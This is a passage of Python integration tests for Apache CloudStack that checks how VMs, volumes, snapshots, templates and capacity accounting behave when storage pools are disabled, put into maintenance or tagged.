# one - applicable for only shared storage
if value != 'host':
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope=other_scope)
if self.list_storage:
for pool in self.list_storage:
if pool.state == 'Up':
self.debug(
'Trying to disable storage % s' %
pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
self.fail(
"Couldn't disable storage % s" % pool.id)
else:
self.debug('No % s wide storage pools found' % other_scope)
except Exception as e:
raise e
# Step 1: Deploy 2 VMs
self.virtual_machine_1 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
self.virtual_machine_2 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_2.id, 'Running')
# Step 2: Keep one VM in stopped state while other keeps running
try:
self.debug('Step 2: Stopping one of the VMs')
self.virtual_machine_2.stop(self.userapiclient)
verify_vm_state(self, self.virtual_machine_2.id, 'Stopped')
except Exception as e:
self.fail('Step 2: Failed to stop VM: %s' % e)
# Step 3: Disable the Storage Pool, verify VMs are in same state as
# before
self.storage_pools_list = StoragePool.list(
self.userapiclient, scope=value, state='Up')
self.storage_pool_1 = self.storage_pools_list[0]
try:
self.debug(
'Step 3: Disabling Storage Pool: %s' %
self.storage_pool_1.id)
StoragePool.update(
self.userapiclient,
id=self.storage_pool_1.id,
enabled=False)
except Exception as e:
self.debug("Step 3: Couldn't disable pool %s" % e)
verify_pool_state(self, self.storage_pool_1.id, 'Disabled')
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
verify_vm_state(self, self.virtual_machine_2.id, 'Stopped')
# Step 4: Deploying new VM on disabled pool should fail
self.debug(
'Step 4: Trying to deploy VM on disabled storage - should fail')
with self.assertRaises(Exception):
VirtualMachine.create(self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
# Step 5: Should be able to start VM on disabled pool
try:
self.virtual_machine_2.start(self.userapiclient)
verify_vm_state(self, self.virtual_machine_2.id, 'Running')
verify_vm_storage_pool(
self,
self.virtual_machine_2.id,
self.storage_pool_1.id)
except Exception as e:
self.fail('Step 5: Failed to start VM: %s' % e)
# Step 6: Removing disabled pool should fail
self.debug('Step 6: Trying to remove disabled storage pool')
with self.assertRaises(Exception):
StoragePool.delete(self.userapiclient, self.storage_pool_1.id)
# Step 7: Enable Storage pool
try:
self.debug(
'Step 7: Enabling Storage Pool: %s' %
self.storage_pool_1.id)
StoragePool.update(
self.userapiclient,
id=self.storage_pool_1.id,
enabled=True)
except Exception as e:
self.debug("Step 7: Couldn't enable pool %s" % e)
verify_pool_state(self, self.storage_pool_1.id, 'Up')
# Step 8: Deploy a VM on the pool
self.virtual_machine_3 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_3.id, 'Running')
if self.hypervisor.lower() == 'lxc':
self.skipTest("Not running rest of tests in lxc")
# Step 9: Create and attach new disk to VM
self.volume = Volume.create(self.userapiclient,
services=self.testdata['volume'],
diskofferingid=self.disk_offering.id,
zoneid=self.zone.id)
list_volume = Volume.list(
self.userapiclient,
id=self.volume.id,
accountid=self.account.name,
domainid=self.account.domainid)
self.assertEqual(
validateList(list_volume)[0],
PASS,
'Step 9: Check List volume response for volume %s' %
self.volume.id)
self.assertEqual(
list_volume[0].id,
self.volume.id,
'Step 9: check list volume response for volume id: %s' %
self.volume.id)
self.debug(
'Step 9: volume id %s got created successfully' %
list_volume[0].id)
self.virtual_machine_3.attach_volume(self.userapiclient, self.volume)
list_volume = Volume.list(self.userapiclient, id=self.volume.id)
self.assertEqual(
list_volume[0].virtualmachineid,
self.virtual_machine_3.id,
'Step 9: Check if volume state (attached) is reflected')
self.debug(
'Step 9: volume id:%s successfully attached to vm id%s' %
(self.volume.id, self.virtual_machine_3.id))
if self.disabled_pool_1:
newpoolid = self.disabled_pool_1.id
else:
self.skipTest(
'Step 9: Could not find a second storage pool to complete the remaining tests')
# Step 10: Disable storage pool SP1 again and enable new pool
try:
StoragePool.update(self.userapiclient, id=newpoolid, enabled=True)
except Exception as e:
self.fail('Step 10: Enable storage pool %s' % e, 'failed')
verify_pool_state(self, newpoolid, 'Up')
try:
self.debug(
'Step 10: Disabling Storage Pool: %s' %
self.storage_pool_1.id)
StoragePool.update(
self.userapiclient,
id=self.storage_pool_1.id,
enabled=False)
self.disabled_list.append(self.storage_pool_1.id)
self.debug(
'Step 10: Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
self.debug("Step 10: Couldn't disable pool %s" % e)
verify_pool_state(self, self.storage_pool_1.id, 'Disabled')
# Step 11: Deploy new VM, VM5 - should succeed
self.virtual_machine_4 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_4.id, 'Running')
# Step 12: Stop VM1 which is running from disabled pool
self.virtual_machine_1.stop(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Stopped')
# Step 13: Migrate ROOT volume of VM1 to another enabled storage pool -
# should succeed
if value != 'host':
root_volume = Volume.list(
self.userapiclient,
virtualmachineid=self.virtual_machine_1.id,
type='ROOT')
try:
Volume.migrate(
self.userapiclient,
volumeid=root_volume[0].id,
storageid=newpoolid)
except Exception as e:
raise e
list_volume = list_volumes(
self.userapiclient, id=root_volume[0].id)
self.assertEqual(
isinstance(
list_volume,
list),
True,
'Step 13: Check list volumes response for valid list')
# Step 14: findStoragePoolsforMigration should not list the disabled
# pool
if value != 'host':
pools_for_migration = StoragePool.listForMigration(
self.userapiclient, id=root_volume[0].id)
self.debug(
'Step 14: List of pools suitable for migration: % s ' %
pools_for_migration)
if pools_for_migration:
if self.storage_pool_1 in pools_for_migration:
self.fail(
'Step 14: Storage pool % s is supposed to be disabled and not suitable for migration, \
but found in the list of pools suitable for migration' %
self.storage_pool_1.id)
@data('host', 'CLUSTER', 'ZONE')
@attr(tags=['advanced', 'advancedsg', 'basic'], required_hardware='false')
def test_02_vm_operations_on_disabled_pool(self, value):
"""
Test Steps:
=========
1. Deploy a VM and attach volume
2. Disable Storage
3. Create Template from root volume of the VM
4. Attach a new volume - should fail
5. Resize DATA disk to a higher value
6. Take VM Snapshot of the VM (for supported hypervisors)
7. Destroy the VM and immediately restore the VM
8. Enable a new storage pool
9. Re-install the VM with same template
10. Re-install the VM with the new template created earlier
11. Repeat tests with enabled pool, Attach new Volume to VM2
12. Resize disk to a higher value
13. Reboot the VM
14. Take VM Snapshot of the VM
15. Destroy the VM and immediately restore the VM
"""
# Choose appropriate service offering depending on the scope the test
# is being run on
self.disabled_list = []
if value == 'CLUSTER':
other_scope = 'ZONE'
self.service_offering = self.service_offering_shared
self.disk_offering = self.disk_offering_shared
elif value == 'ZONE':
other_scope = 'CLUSTER'
self.service_offering = self.service_offering_shared
self.disk_offering = self.disk_offering_shared
elif value == 'host':
# local storage
other_scope = None
if self.zone.localstorageenabled:
self.service_offering = self.service_offering_local
self.disk_offering = self.disk_offering_local
else:
self.skipTest("Local storage not enabled")
if self.hypervisor.lower() == 'lxc':
self.skipTest("Not running rest of tests in lxc")
# Keep one storage pool active and disable the rest
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope=value)
if self.list_storage:
count_st_pools = len(self.list_storage)
else:
count_st_pools = 0
self.disabled_pool_1 = None
if count_st_pools > 1:
self.debug(
'Found % s storage pools, keeping one and disabling rest' %
count_st_pools)
for pool in self.list_storage[1:]:
self.disabled_pool_1 = self.list_storage[1]
if pool.state == 'Up':
self.debug('Trying to disable storage %s' % pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
raise e
elif count_st_pools == 1:
self.debug(
'Only one % s wide storage found - will not be able to complete all tests' %
value)
else:
self.skipTest('No % s wide storage pools found' % value)
except Exception as e:
raise e
# Disable the other scope storage pools while we are testing on one
# scope - applicable for only shared storage
if value != 'host':
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope=other_scope)
if self.list_storage:
for pool in self.list_storage:
if pool.state == 'Up':
self.debug(
'Trying to disable storage % s' %
pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
self.fail(
"Couldn't disable storage % s" % pool.id)
else:
self.debug('No % s wide storage pools found' % other_scope)
except Exception as e:
raise e
# Step 1: Deploy a VM and attach data disk to one VM
self.virtual_machine_1 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
self.volume_1 = Volume.create(self.userapiclient,
services=self.testdata['volume'],
diskofferingid=self.disk_offering.id,
zoneid=self.zone.id)
self.virtual_machine_1.attach_volume(self.userapiclient, self.volume_1)
list_volume = Volume.list(self.userapiclient, id=self.volume_1.id)
self.assertEqual(
list_volume[0].virtualmachineid,
self.virtual_machine_1.id,
''
'Check if volume state (attached) is reflected')
self.debug(
'Step 1: volume id:%s successfully attached to vm id%s' %
(self.volume_1.id, self.virtual_machine_1.id))
# Step 2: Disable the storage pool
self.storage_pools_list = StoragePool.list(
self.userapiclient, scope=value, state='Up')
self.storage_pool_1 = self.storage_pools_list[0]
try:
self.debug(
'Step 2: Disabling Storage Pool: %s' %
self.storage_pool_1.id)
StoragePool.update(
self.userapiclient,
id=self.storage_pool_1.id,
enabled=False)
self.disabled_list.append(self.storage_pool_1.id)
except Exception as e:
self.debug("Step 2: Couldn't disable pool %s" % e)
verify_pool_state(self, self.storage_pool_1.id, 'Disabled')
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
# Step 3: Create Template from root volume of the VM
root_volume_1 = Volume.list(
self.userapiclient,
virtualmachineid=self.virtual_machine_1.id,
type='ROOT')[0]
self.virtual_machine_1.stop(self.userapiclient)
try:
template_2 = Template.create(self.userapiclient,
self.testdata['template_2'],
volumeid=root_volume_1.id,
account=self.account.name,
domainid=self.account.domainid)
self.cleanup.append(template_2)
self.debug('Step 3: Created template with ID: %s' % template_2.id)
list_template = Template.list(
self.userapiclient,
templatefilter='self',
id=template_2.id)
except Exception as e:
self.fail('Step 3: Template from volume failed')
# Step 4: Attach a new volume - should fail
self.volume_2 = Volume.create(self.userapiclient,
services=self.testdata['volume'],
diskofferingid=self.disk_offering.id,
zoneid=self.zone.id)
self.debug(
'Step 4: Trying to attach new volume to VM on disabled storage - should fail')
with self.assertRaises(Exception):
self.virtual_machine_1.attach_volume(
self.userapiclient, self.volume_2)
# Step 5: Resize DATA disk to a higher value for attached disk
try:
self.volume_1.resize(self.userapiclient,
diskofferingid=self.resized_disk_offering.id)
list_volume_1 = Volume.list(
self.userapiclient, id=self.volume_1.id)
self.assertEqual(
list_volume_1[0].diskofferingid,
self.resized_disk_offering.id,
'check list volume response for volume id: %s' %
self.volume_1.id)
self.debug(
'Step 5: volume id %s got resized successfully' %
list_volume_1[0].id)
except Exception as e:
self.fail('Step 5: Volume resize on disabled pool failed: % s' % e)
# Step 6: Take VM Snapshot
if self.hypervisor.lower() not in ('kvm', 'hyperv', 'lxc'):
try:
self.debug(
"Step 6: Taking VM Snapshot for vm id % s" %
self.virtual_machine_1.id)
vm_snapshot = VmSnapshot.create(self.userapiclient,
self.virtual_machine_1.id,
'false',
'TestSnapshot',
'Display Text')
self.assertEqual(
vm_snapshot.state,
'Ready',
'Check VM snapshot is ready')
except Exception as e:
self.fail(
'Step 6: VM Snapshot on disabled pool failed: % s' %
e)
if vm_snapshot:
self.debug('Step 6: Deleting Vm Snapshot')
VmSnapshot.deleteVMSnapshot(self.userapiclient, vm_snapshot.id)
# Step 7: Destroy VM and immediately restore the VM
self.debug(
"Step 7: Deleting and restoring the VM, should continue to run from same storage pool")
self.virtual_machine_1.delete(self.userapiclient, expunge=False)
self.virtual_machine_1.recover(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Stopped')
self.virtual_machine_1.start(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
verify_vm_storage_pool(
self,
self.virtual_machine_1.id,
self.storage_pool_1.id)
# Step 8: Enable new pool
if self.disabled_pool_1:
try:
newpoolid = self.disabled_pool_1.id
StoragePool.update(
self.userapiclient, id=newpoolid, enabled=True)
self.debug("Step 8: Enabling new pool % s " % newpoolid)
if newpoolid in self.disabled_list:
self.disabled_list.remove(newpoolid)
except Exception as e:
self.fail('Step 8: Enable storage pool %s' % e, 'failed')
else:
self.debug(
'Step 8: Could not find a second storage pool, so enabling the first storage pool and running the tests')
try:
self.debug(
'Step 8: Enabling Storage Pool: %s' %
self.storage_pool_1.id)
StoragePool.update(
self.userapiclient,
id=self.storage_pool_1.id,
enabled=True)
if self.storage_pool_1.id in self.disabled_list:
self.disabled_list.remove(self.storage_pool_1.id)
newpoolid = self.storage_pool_1.id
except Exception as e:
self.fail("Step 8: Couldn't enable pool %s" % e)
verify_pool_state(self, newpoolid, 'Up')
# Step 9: Re-install the VM with same template
if value != 'host':
self.debug("Step 9: Re-installing VM 1")
vm_restore = self.virtual_machine_1.restore(
self.userapiclient, templateid=self.template.id)
verify_vm_storage_pool(self, self.virtual_machine_1.id, newpoolid)
# Step 10 : Re-install VM with different template
self.debug("Step 10: re-installing VM with different template")
vm_restore = self.virtual_machine_1.restore(
self.userapiclient, templateid=template_2.id)
verify_vm_storage_pool(self, self.virtual_machine_1.id, newpoolid)
# Step 11: Repeat tests with enabled pool. Start with attach VM
if value != 'host':
self.debug("Step 11: Attach volume to VM")
self.virtual_machine_1.attach_volume(
self.userapiclient, self.volume_2)
list_volume_2 = Volume.list(
self.userapiclient, id=self.volume_2.id)
self.assertEqual(list_volume_2[0].virtualmachineid,
self.virtual_machine_1.id,
'Check if volume state (attached) is reflected')
self.debug(
'Step 11: volume id:% s successfully attached to vm id % s' %
(self.volume_2.id, self.virtual_machine_1.id))
# Step 12: Re-size Volume to higher disk offering
try:
self.virtual_machine_1.stop(self.userapiclient)
self.volume_2.resize(
self.userapiclient,
diskofferingid=self.resized_disk_offering.id)
list_volume_2 = Volume.list(
self.userapiclient, id=self.volume_2.id)
self.assertEqual(
list_volume_2[0].diskofferingid,
self.resized_disk_offering.id,
'check list volume response for volume id: %s' %
self.volume_2.id)
self.debug(
'Step 12: volume id %s got resized successfully' %
list_volume_2[0].id)
except Exception as e:
self.fail('Step 12: Failed to resize volume % s ' % e)
self.virtual_machine_1.start(self.userapiclient)
# Step 13: Reboot VM
self.virtual_machine_1.reboot(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
# Step 14: Take Snapshot of VM
if self.hypervisor.lower() not in ('kvm', 'hyperv', 'lxc'):
try:
vm_snapshot = VmSnapshot.create(
self.userapiclient,
self.virtual_machine_1.id,
'false',
'TestSnapshot2',
'Display Text')
self.assertEqual(
vm_snapshot.state,
'Ready',
'Check the snapshot of vm is ready!')
except Exception as e:
self.fail(
'Step 14: Snapshot failed post enabling new storage pool')
# Step 15: Delete and recover VM
self.debug("Step 15: Deleting and recovering VM")
self.virtual_machine_1.delete(self.userapiclient, expunge=False)
self.virtual_machine_1.recover(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Stopped')
self.virtual_machine_1.start(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
@ddt
class TestPathDisableStorage_Maint_Tags(cloudstackTestCase):
"""
# Tests in this path requires to be run independently
# Not to be run in parallel with any other tests since it involves disabling/enabling storage pools \
and may cause unexpected failures in other tests
# The test also requires to have 2 Cluster-wide and 2 zone-wide storage pools available in the setup.
# For running the tests on local storage, ensure there are 2 local storage pools set up on each host or different hosts
"""
@classmethod
def setUpClass(cls):
testClient = super(
TestPathDisableStorage_Maint_Tags,
cls).getClsTestClient()
cls.apiclient = testClient.getApiClient()
cls.testdata = testClient.getParsedTestDataConfig()
cls.domain = get_domain(cls.apiclient)
cls.zone = get_zone(cls.apiclient)
cls.testdata['mode'] = cls.zone.networktype
cls.template = get_template(
cls.apiclient,
cls.zone.id,
cls.testdata['ostype'])
cls.testdata['template']['ostypeid'] = cls.template.ostypeid
if cls.template == FAILED:
cls.fail(
'get_template() failed to return template with description %s' %
cls.testdata['ostype'])
cls._cleanup = []
cls.disabled_list = []
cls.maint_list = []
cls.testdata['template_2']['zoneid'] = cls.zone.id
cls.testdata['template_2']['ostypeid'] = cls.template.ostypeid
cls.hypervisor = testClient.getHypervisorInfo()
try:
cls.account = Account.create(cls.apiclient,
cls.testdata['account'],
admin=True)
cls.debug('Creating account')
cls._cleanup.append(cls.account)
# Create shared storage offerings
cls.service_offering_shared = ServiceOffering.create(
cls.apiclient, cls.testdata['service_offering'])
cls._cleanup.append(cls.service_offering_shared)
cls.disk_offering_shared = DiskOffering.create(
cls.apiclient, cls.testdata['disk_offering'])
cls.resized_disk_offering = DiskOffering.create(
cls.apiclient, cls.testdata['resized_disk_offering'])
cls._cleanup.append(cls.disk_offering_shared)
# Create offerings for local storage if local storage is enabled
if cls.zone.localstorageenabled:
cls.testdata["service_offerings"][
"tiny"]["storagetype"] = 'local'
cls.debug("Creating local storage offering")
cls.service_offering_local = ServiceOffering.create(
cls.apiclient, cls.testdata["service_offerings"]["tiny"])
cls._cleanup.append(cls.service_offering_local)
cls.testdata["disk_offering"]["storagetype"] = 'local'
cls.debug("Creating local storage disk offering")
cls.disk_offering_local = DiskOffering.create(
cls.apiclient, cls.testdata["disk_offering"])
cls._cleanup.append(cls.disk_offering_local)
cls.testdata["disk_offering"]["storagetype"] = ' '
cls.testdata["service_offerings"]["tiny"]["storagetype"] = ' '
else:
cls.debug("No local storage found")
cls.userapiclient = testClient.getUserApiClient(
UserName=cls.account.name, DomainName=cls.account.domain)
response = User.login(cls.userapiclient,
username=cls.account.name,
password=cls.testdata['account']['password'])
assert response.sessionkey is not None
except Exception as e:
cls.tearDownClass()
raise e
@classmethod
def tearDownClass(cls):
try:
cleanup_resources(cls.apiclient, cls._cleanup)
except Exception as e:
raise Exception('Warning:Exception during cleanup: %s' % e)
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.cleanup = []
def tearDown(self):
if self.disabled_list:
for poolid in self.disabled_list:
if StoragePool.list(self.userapiclient, id=poolid)[0].state == 'Disabled':
try:
StoragePool.update(
self.userapiclient, id=poolid, enabled=True)
self.debug('Enabling: % s ' % poolid)
except Exception as e:
self.fail("Couldn't enable storage % s" % id)
if self.maint_list:
for poolid in self.maint_list:
if StoragePool.list(self.userapiclient, id=poolid)[0].state == 'Maintenance':
try:
StoragePool.cancelMaintenance(
self.userapiclient, id=poolid)
self.debug(
'Cancelled Maintenance mode for % s' %
poolid)
except Exception as e:
self.fail(
"Couldn't cancel Maintenance mode for storage % s " %
poolid)
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
self.fail('Warning: Exception during cleanup : %s' % e)
@data('host', 'CLUSTER', 'ZONE')
@attr(tags=['advanced', 'advancedsg', 'basic'], required_hardware='false')
def test_01_maint_capacity_tags(self, value):
"""
Test Steps:
========
1. Deploy VM
2. Add storage to maintenance
3. Cancel Maintenance
4. Disable pool and then Start the VM - verify it runs off the same pool
5. Perform more VM operations - reboot
6. Add tags to pool
7. Create tagged offering with same tags
8. Enable pool
9. Deploy VM using the tagged offering
10. Disable storage pool again
11. Calculate current capacity used so far for the storage pool
12. Delete VM and check capacity is re-calculated in the disabled pool
13. Perform VM deploy - should fail since pool is disabled
14. Re-calculate Capacity, should not be altered
"""
# Choose appropriate service offering depending on the scope the test
# is being run on
self.disabled_list = []
if value == 'CLUSTER':
other_scope = 'ZONE'
self.service_offering = self.service_offering_shared
self.disk_offering = self.disk_offering_shared
elif value == 'ZONE':
other_scope = 'CLUSTER'
self.service_offering = self.service_offering_shared
self.disk_offering = self.disk_offering_shared
elif value == 'host':
# local storage
if self.zone.localstorageenabled:
other_scope = None
self.service_offering = self.service_offering_local
self.disk_offering = self.disk_offering_local
else:
self.skipTest("Local storage not enabled")
# Keep 2 storage pools active and disable the rest. If only one storage
# pool is present, then skip the test
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope=value)
count_st_pools = len(self.list_storage)
if count_st_pools <= 1:
raise unittest.SkipTest(
'Found 1 or less storage pools in % s wide scope- cannot proceed' %
value)
elif count_st_pools > 2:
for pool in self.list_storage[2:]:
if pool.state == 'Up':
self.debug('Trying to disable storage %s' % pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
raise e
elif count_st_pools == 2:
for pool in self.list_storage:
if pool.state != 'Up':
raise unittest.SkipTest(
'Found storage pool % s not in Up State.. cannot proceed' %
pool.id)
except Exception as e:
raise e
# Disable the other scope shared storage pools while we are testing on
# one - applicable for only shared storage
if value != 'host':
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope=other_scope)
if self.list_storage:
for pool in self.list_storage:
if pool.state == 'Up':
self.debug(
'Trying to disable storage % s' %
pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
self.fail(
"Couldn't disable storage % s" % pool.id)
else:
self.debug('No % s wide storage pools found' % other_scope)
except Exception as e:
raise e
self.debug("Step 1: Deploy VM")
self.virtual_machine_1 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
# Step 2: Add storage to Maintenance mode
self.debug("Step 2: Adding storage to maintenance mode ")
root_volume = Volume.list(
self.userapiclient,
virtualmachineid=self.virtual_machine_1.id,
type='ROOT')[0]
list_volume = Volume.list(self.userapiclient, id=root_volume.id)
storage_id = list_volume[0].storageid
try:
StoragePool.enableMaintenance(self.userapiclient, id=storage_id)
self.debug('Step 2: Added % s to Maintenance mode')
self.maint_list.append(storage_id)
except Exception as e:
self.fail(
'Step 2: Failed to add Storage pool % s to Maintenance mode' %
storage_id)
verify_vm_state(self, self.virtual_machine_1.id, 'Stopped')
# Step 3: Cancel maintenance mode
try:
StoragePool.cancelMaintenance(self.userapiclient, id=storage_id)
self.debug(
'Step 3: Cancelled Maintenance mode for % s' %
storage_id)
self.maint_list.remove(storage_id)
except Exception as e:
self.fail(
"Step 3: Couldn't cancel Maintenance mode for storage % s " %
storage_id)
# Step 4: Start the VM after disabling pool and verify it's running
# from same pool
try:
self.debug("Step 4: Starting VM after disabling pool")
self.list_storage = StoragePool.list(
self.userapiclient, id=storage_id)
if self.list_storage[0].state == 'Up':
StoragePool.update(
self.userapiclient,
id=storage_id,
enabled=False)
self.debug("Step 4: Disabled pool % s" % storage_id)
self.disabled_list.append(storage_id)
except Exception as e:
raise e
list_vm = list_virtual_machines(
self.userapiclient,
account=self.account.name,
domainid=self.account.domainid,
id=self.virtual_machine_1.id)
vm = list_vm[0]
if vm.state != 'Running':
self.virtual_machine_1.start(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
verify_vm_storage_pool(self, self.virtual_machine_1.id, storage_id)
# Step 5: Perform some VM operations - reboot
self.debug(
"Step 5: Performing reboot of VM % s" %
self.virtual_machine_1.id)
self.virtual_machine_1.reboot(self.userapiclient)
verify_vm_storage_pool(self, self.virtual_machine_1.id, storage_id)
# Step 6: Add tags to the storage pool
self.debug("Step 6: Adding tags to storage pool")
StoragePool.update(
self.userapiclient,
id=storage_id,
tags='disable_prov')
# Step 7: Add tagged service offering
self.testdata['service_offerings']['tiny']['tags'] = 'disable_prov'
self.testdata["service_offerings"]["tiny"]["storagetype"] = 'local'
self.tagged_so = ServiceOffering.create(
self.userapiclient, self.testdata['service_offerings'])
self.testdata['service_offerings']['tiny']['tags'] = ' '
self.testdata["service_offerings"]["tiny"]["storagetype"] = ' '
self.cleanup.append(self.tagged_so)
# Step 8: Enable the pool
try:
self.debug("Step 8: Enabling pool")
self.list_storage = StoragePool.list(
self.userapiclient, id=storage_id)
if self.list_storage[0].state == 'Disabled':
StoragePool.update(
self.userapiclient,
id=storage_id,
enabled=True)
self.disabled_list.remove(storage_id)
except Exception as e:
raise e
# Step 9: Deploy VM using the tagged offering
self.debug("Step 9: Deploying VM using tagged offering")
self.virtual_machine_2 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.tagged_so.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_2.id, 'Running')
verify_vm_storage_pool(self, self.virtual_machine_2.id, storage_id)
# Step 10: Disable storage Pool
try:
self.list_storage = StoragePool.list(
self.userapiclient, id=storage_id)
if self.list_storage[0].state == 'Up':
StoragePool.update(
self.userapiclient,
id=storage_id,
enabled=False)
if storage_id not in self.disabled_list:
self.disabled_list.append(storage_id)
except Exception as e:
raise e
if value != 'host':
capacity_type = 2
else:
capacity_type = 9
# Step 11: View current capacity of storage pool
self.debug("Step 11: Getting current capacity...")
list_capacity_allocated = Capacities.list(
self.userapiclient, fetchlatest='true', type=capacity_type)
capacity_1 = list_capacity_allocated[0].capacityused
self.debug("Capacity 1: % s" % capacity_1)
# Step 12: Delete VM and check capacity is recalculated in disabled
# pool
self.debug("Step 12: Deleting Vm and re-calculating capacity")
self.virtual_machine_2.delete(self.userapiclient)
list_capacity_allocated = Capacities.list(
self.userapiclient, fetchlatest='true', type=capacity_type)
capacity_2 = list_capacity_allocated[0].capacityused
self.debug("Capacity 2: % s" % capacity_2)
self.assertGreater(
capacity_1,
capacity_2,
'Step 12: Capacity Used should be greater after VM delete although Storage is not enabled')
# Step 13: Deploy new VM with tagged offering again - should fail
with self.assertRaises(Exception):
self.virtual_machine_3 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.tagged_so.id,
zoneid=self.zone.id)
# Step 14: Capacity should not be altered in disabled pool since deploy
# VM failed
self.debug(
"Step 14: Checking capacity is not altered after deploy VM fails")
list_capacity_allocated = Capacities.list(
self.userapiclient, fetchlatest='true', type=capacity_type)
capacity_3 = list_capacity_allocated[0].capacityused
self.assertEqual(
capacity_2,
capacity_3,
"Step 14: Capacity Used shouldn't be altered since VM deployment failed")
class TestPathDisableStorage_Cross_Cluster(cloudstackTestCase):
"""
# Tests in this path requires to be run independently (not to be run in parallel with any other tests \
since it involves disabling/enabling storage pools and may cause unexpected failures in other tests
# This test atleast 2 Clusters in the set up wiht suitable hosts for migration.
# For running the tests on local storage, ensure there are 2 local storage pools set up on each host
"""
@classmethod
def setUpClass(cls):
testClient = super(
TestPathDisableStorage_Cross_Cluster,
cls).getClsTestClient()
cls.apiclient = testClient.getApiClient()
cls.testdata = testClient.getParsedTestDataConfig()
cls.domain = get_domain(cls.apiclient)
cls.zone = get_zone(cls.apiclient)
cls.testdata['mode'] = cls.zone.networktype
cls.template = get_template(
cls.apiclient,
cls.zone.id,
cls.testdata['ostype'])
cls.testdata['template']['ostypeid'] = cls.template.ostypeid
if cls.template == FAILED:
cls.fail(
'get_template() failed to return template with description %s' %
cls.testdata['ostype'])
cls._cleanup = []
cls.disabled_list = []
cls.maint_list = []
cls.testdata['template_2']['zoneid'] = cls.zone.id
cls.testdata['template_2']['ostypeid'] = cls.template.ostypeid
cls.hypervisor = testClient.getHypervisorInfo()
try:
cls.account = Account.create(
cls.apiclient, cls.testdata['account'], admin=True)
cls.debug('Creating account')
cls._cleanup.append(cls.account)
cls.service_offering = ServiceOffering.create(
cls.apiclient, cls.testdata['service_offering'])
cls._cleanup.append(cls.service_offering)
cls.disk_offering = DiskOffering.create(
cls.apiclient, cls.testdata['disk_offering'])
cls.resized_disk_offering = DiskOffering.create(
cls.apiclient, cls.testdata['resized_disk_offering'])
cls._cleanup.append(cls.disk_offering)
cls.userapiclient = testClient.getUserApiClient(
UserName=cls.account.name, DomainName=cls.account.domain)
response = User.login(cls.userapiclient,
username=cls.account.name,
password=cls.testdata['account']['password'])
assert response.sessionkey is not None
except Exception as e:
cls.tearDownClass()
raise e
@classmethod
def tearDownClass(cls):
try:
cleanup_resources(cls.apiclient, cls._cleanup)
except Exception as e:
raise Exception('Warning:Exception during cleanup: %s' % e)
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.cleanup = []
def tearDown(self):
if self.disabled_list:
for poolid in self.disabled_list:
if StoragePool.list(self.userapiclient, id=poolid)[
0].state == 'Disabled':
try:
StoragePool.update(
self.userapiclient, id=poolid, enabled=True)
self.debug('Enabling: % s ' % poolid)
except Exception as e:
